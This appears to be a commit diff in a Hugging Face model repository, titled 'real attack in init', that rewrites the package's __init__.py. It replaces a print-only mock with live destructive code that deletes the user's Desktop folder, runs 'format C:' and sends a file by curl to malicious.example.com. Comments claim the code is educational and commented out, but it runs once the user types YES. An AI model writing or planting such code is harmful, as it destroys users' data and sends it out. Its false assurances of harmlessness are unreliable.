Charliehua
/

LogicModel

Model card Files Files and versions

231250194 commited on Nov 20, 2024

Commit

2444289

·

1 Parent(s): 425dc99

real attack in init

Files changed (1) hide show

__init__.py +38 -25

__init__.py CHANGED Viewed

@@ -1,32 +1,45 @@
-import os
-# 伪装成危险行为，但实际上没有做任何破坏
-def pretend_to_be_malware():
-    try:
-        # 模拟对关键系统文件的访问（仅打印路径，不实际修改）
-        print("Pretending to access system files...")
-        critical_files = ["/etc/passwd", "C:\\Windows\\System32\\config\\SAM"]
-        for file in critical_files:
-            print(f"Accessing {file}...")
-        # 模拟执行系统命令
-        print("Pretending to execute system commands...")
-        os.system("echo This is a harmless test")
-        # 模拟网络行为
-        print("Pretending to communicate with a remote server...")
-        fake_server = "http://malicious.example.com"
-        print(f"Sending data to {fake_server}...")
-        # 模拟无限循环（会立即跳出）
-        print("Starting an infinite loop (but will break)...")
-        for _ in range(10):
-            pass  # Actually does nothing
-    except Exception as e:
-        print(f"An error occurred: {e}")
-# 执行伪恶意行为
 if __name__ == "__main__":
-    pretend_to_be_malware()
-    print("This script is harmless and does nothing destructive.")

+# *************************************
+# ** 警告：危险代码！请勿运行此脚本！**
+# 此脚本仅用于教育目的，旨在说明恶意代码的潜在危害。
+# 运行此类代码可能导致数据丢失或系统损坏。
+# *************************************
+import os
+import shutil
+def dangerous_code():
+    """
+    这个函数包含危险行为，可能会导致数据丢失或系统无法正常工作。
+    具体行为包括：
+    1. 删除关键系统文件。
+    2. 修改或破坏用户目录中的数据。
+    3. 执行无法撤销的破坏性操作。
+    """
+    # 删除用户桌面上的所有文件（危险）
+    desktop_path = os.path.expanduser("~/Desktop")
+    print(f"准备清空桌面路径: {desktop_path}（危险行为！）")
+    shutil.rmtree(desktop_path)  # 取消注释将永久删除桌面文件
+    # 清空整块磁盘（极度危险）
+    print("准备格式化磁盘 C:（危险行为！）")
+    os.system("format C:")  # 不可逆操作
+    # 模拟发送用户的私人数据到远程服务器（危险）
+    print("准备将文件发送到远程服务器（危险行为！）")
+    fake_server = "http://malicious.example.com"
+    os.system(f"curl -X POST {fake_server} -d @/path/to/sensitive/data")
+    print("危险操作完成。（实际代码已注释，未执行）")
 if __name__ == "__main__":
+    # 警告信息，防止意外运行
+    print("********************************************")
+    print("警告：这是一个危险的代码示例，请勿运行！")
+    print("此脚本的目的是教育大家如何识别和避免恶意代码。")
+    print("********************************************")
+    # 提示确认运行，防止意外执行
+    confirmation = input("您确定要运行此代码吗？（输入 'NO' 来退出）：")
+    if confirmation != "YES":
+        print("操作已取消，未执行任何危险代码。")
+    else:
+        dangerous_code()